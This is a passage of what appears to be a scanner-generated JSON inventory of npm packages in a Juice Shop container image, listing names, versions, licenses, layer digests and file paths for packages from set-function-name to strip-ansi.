+ "ID": "set-function-name@2.0.2", + "Name": "set-function-name", + "Identifier": { + "PURL": "pkg:npm/set-function-name@2.0.2", + "UID": "83b9f6080df237d4" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/set-function-name/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "setimmediate@1.0.5", + "Name": "setimmediate", + "Identifier": { + "PURL": "pkg:npm/setimmediate@1.0.5", + "UID": "7926999ab932e751" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/setimmediate/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "setprototypeof@1.2.0", + "Name": "setprototypeof", + "Identifier": { + "PURL": "pkg:npm/setprototypeof@1.2.0", + "UID": "d490a1aba56f8933" + }, + "Version": "1.2.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/setprototypeof/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "shebang-command@2.0.0", + "Name": "shebang-command", + "Identifier": { + "PURL": "pkg:npm/shebang-command@2.0.0", + "UID": "d608768bc9cd21e1" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/shebang-command/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "shebang-regex@3.0.0", + "Name": "shebang-regex", + "Identifier": { + "PURL": "pkg:npm/shebang-regex@3.0.0", + "UID": "34963b09e9d31348" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/shebang-regex/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "side-channel@1.1.0", + "Name": "side-channel", + "Identifier": { + "PURL": "pkg:npm/side-channel@1.1.0", + "UID": "b8e6c36c58bebe9e" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/side-channel/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "side-channel-list@1.0.1", + "Name": "side-channel-list", + "Identifier": { + "PURL": "pkg:npm/side-channel-list@1.0.1", + "UID": "48a5a00345e03ffe" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/side-channel-list/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "side-channel-map@1.0.1", + "Name": "side-channel-map", + "Identifier": { + "PURL": "pkg:npm/side-channel-map@1.0.1", + "UID": "ab87a26e7d2e0f32" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/side-channel-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "side-channel-weakmap@1.0.2", + "Name": "side-channel-weakmap", + "Identifier": { + "PURL": "pkg:npm/side-channel-weakmap@1.0.2", + "UID": "9203823616b33251" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/side-channel-weakmap/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "signal-exit@3.0.7", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@3.0.7", + "UID": "5b62bbc8585b1db4" + }, + "Version": "3.0.7", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/signal-exit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "signal-exit@4.1.0", + "Name": "signal-exit", + "Identifier": { + "PURL": "pkg:npm/signal-exit@4.1.0", + "UID": "89b7d85f2a701c5e" + }, + "Version": "4.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/foreground-child/node_modules/signal-exit/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "simple-concat@1.0.1", + "Name": "simple-concat", + "Identifier": { + "PURL": "pkg:npm/simple-concat@1.0.1", + "UID": "885cabca534b8ca3" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/simple-concat/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "simple-get@3.1.1", + "Name": "simple-get", + "Identifier": { + "PURL": "pkg:npm/simple-get@3.1.1", + "UID": "f4439c00f204a322" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/simple-get/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "simple-get@4.0.1", + "Name": "simple-get", + "Identifier": { + "PURL": "pkg:npm/simple-get@4.0.1", + "UID": "6466c032780d4188" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/simple-get/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "simple-get@4.0.1", + "Name": "simple-get", + "Identifier": { + "PURL": "pkg:npm/simple-get@4.0.1", + "UID": "8585c47e829307b7" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/simple-get/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "smart-buffer@4.2.0", + "Name": "smart-buffer", + "Identifier": { + "PURL": "pkg:npm/smart-buffer@4.2.0", + "UID": "cc22175548a04269" + }, + "Version": "4.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/smart-buffer/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socket.io@3.1.2", + "Name": "socket.io", + "Identifier": { + "PURL": "pkg:npm/socket.io@3.1.2", + "UID": "3f7fdf1c8146fe1c" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socket.io-adapter@2.1.0", + "Name": "socket.io-adapter", + "Identifier": { + "PURL": "pkg:npm/socket.io-adapter@2.1.0", + "UID": "4eae05063702235d" + }, + "Version": "2.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io-adapter/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socket.io-parser@4.0.5", + "Name": "socket.io-parser", + "Identifier": { + "PURL": "pkg:npm/socket.io-parser@4.0.5", + "UID": "a00447904d08ddb5" + }, + "Version": "4.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socks@2.8.9", + "Name": "socks", + "Identifier": { + "PURL": "pkg:npm/socks@2.8.9", + "UID": "9a40f7bd175d100c" + }, + "Version": "2.8.9", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socks/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socks-proxy-agent@6.2.1", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@6.2.1", + "UID": "c46eb128bca6585b" + }, + "Version": "6.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/socks-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "socks-proxy-agent@8.0.5", + "Name": "socks-proxy-agent", + "Identifier": { + "PURL": "pkg:npm/socks-proxy-agent@8.0.5", + "UID": "da2f7011f8ee88f9" + }, + "Version": "8.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socks-proxy-agent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sort-keys@1.1.2", + "Name": "sort-keys", + "Identifier": { + "PURL": "pkg:npm/sort-keys@1.1.2", + "UID": "6116547d47f8f1f1" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sort-keys-length/node_modules/sort-keys/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sort-keys@2.0.0", + "Name": "sort-keys", + "Identifier": { + "PURL": "pkg:npm/sort-keys@2.0.0", + "UID": "303c5681072017e1" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sort-keys/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sort-keys-length@1.0.1", + "Name": "sort-keys-length", + "Identifier": { + "PURL": "pkg:npm/sort-keys-length@1.0.1", + "UID": "fc3c6d0d2a93475d" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sort-keys-length/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "source-map@0.6.1", + "Name": "source-map", + "Identifier": { + "PURL": "pkg:npm/source-map@0.6.1", + "UID": "f5517798cd4894db" + }, + "Version": "0.6.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/source-map/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sprintf-js@1.0.3", + "Name": "sprintf-js", + "Identifier": { + "PURL": "pkg:npm/sprintf-js@1.0.3", + "UID": "12b86c25663422e8" + }, + "Version": "1.0.3", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/argparse/node_modules/sprintf-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sprintf-js@1.1.3", + "Name": "sprintf-js", + "Identifier": { + "PURL": "pkg:npm/sprintf-js@1.1.3", + "UID": "152c228d0aa704bc" + }, + "Version": "1.1.3", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sprintf-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "sqlite3@5.1.7", + "Name": "sqlite3", + "Identifier": { + "PURL": "pkg:npm/sqlite3@5.1.7", + "UID": "d16d8e9e554b6fea" + }, + "Version": "5.1.7", + "Licenses": [ + "BSD-3-Clause" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ssri@12.0.0", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@12.0.0", + "UID": "5ce7c8428367a5d" + }, + "Version": "12.0.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/ssri/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "ssri@8.0.1", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@8.0.1", + "UID": "3b948c02b80e3aef" + }, + "Version": "8.0.1", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/ssri/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "stack-trace@0.0.10", + "Name": "stack-trace", + "Identifier": { + "PURL": "pkg:npm/stack-trace@0.0.10", + "UID": "62244aaf18e02eb5" + }, + "Version": "0.0.10", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/stack-trace/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "statuses@1.5.0", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@1.5.0", + "UID": "94155a6f11895ce1" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/serve-index/node_modules/statuses/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "statuses@2.0.2", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@2.0.2", + "UID": "ad739509ed910266" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/statuses/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "stop-iteration-iterator@1.1.0", + "Name": "stop-iteration-iterator", + "Identifier": { + "PURL": "pkg:npm/stop-iteration-iterator@1.1.0", + "UID": "7046b52ae5a4aa44" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/stop-iteration-iterator/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "stream-buffers@2.2.0", + "Name": "stream-buffers", + "Identifier": { + "PURL": "pkg:npm/stream-buffers@2.2.0", + "UID": "2b8bb04184b59cc2" + }, + "Version": "2.2.0", + "Licenses": [ + "Unlicense" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/stream-buffers/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "streamsearch@1.1.0", + "Name": "streamsearch", + "Identifier": { + "PURL": "pkg:npm/streamsearch@1.1.0", + "UID": "a44e12296f9b5d8b" + }, + "Version": "1.1.0", + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/streamsearch/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strict-uri-encode@1.1.0", + "Name": "strict-uri-encode", + "Identifier": { + "PURL": "pkg:npm/strict-uri-encode@1.1.0", + "UID": "79171cdcba7b994e" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/strict-uri-encode/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@1.0.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@1.0.2", + "UID": "6d722b9526ea06aa" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gauge/node_modules/string-width/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@2.1.1", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@2.1.1", + "UID": "9edca9502a39e5" + }, + "Version": "2.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wide-align/node_modules/string-width/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@4.2.3", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@4.2.3", + "UID": "d84f630060cc91bd" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/string-width-cjs/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@4.2.3", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@4.2.3", + "UID": "fd6065d64bfde817" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/string-width/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@5.1.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@5.1.2", + "UID": "32911d6e7b0bd25f" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/@isaacs/cliui/node_modules/string-width/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string-width@5.1.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@5.1.2", + "UID": "c5c0a3741fde98fc" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/wrap-ansi/node_modules/string-width/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string_decoder@0.10.31", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@0.10.31", + "UID": "dc1efaf34b4383f7" + }, + "Version": "0.10.31", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sanitize-html/node_modules/string_decoder/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string_decoder@1.1.1", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.1.1", + "UID": "95f7c82b6418ff50" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/string_decoder/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "string_decoder@1.3.0", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.3.0", + "UID": "d7ace92fccb5110f" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/readable-web-to-node-stream/node_modules/string_decoder/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@3.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@3.0.1", + "UID": "b1597074ed558f71" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/gauge/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@3.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@3.0.1", + "UID": "34b7a0cee25e462a" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/grunt-contrib-compress/node_modules/strip-ansi/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "strip-ansi@4.0.0", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@4.0.0", + "UID": "a3d4d5d15949b457" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": 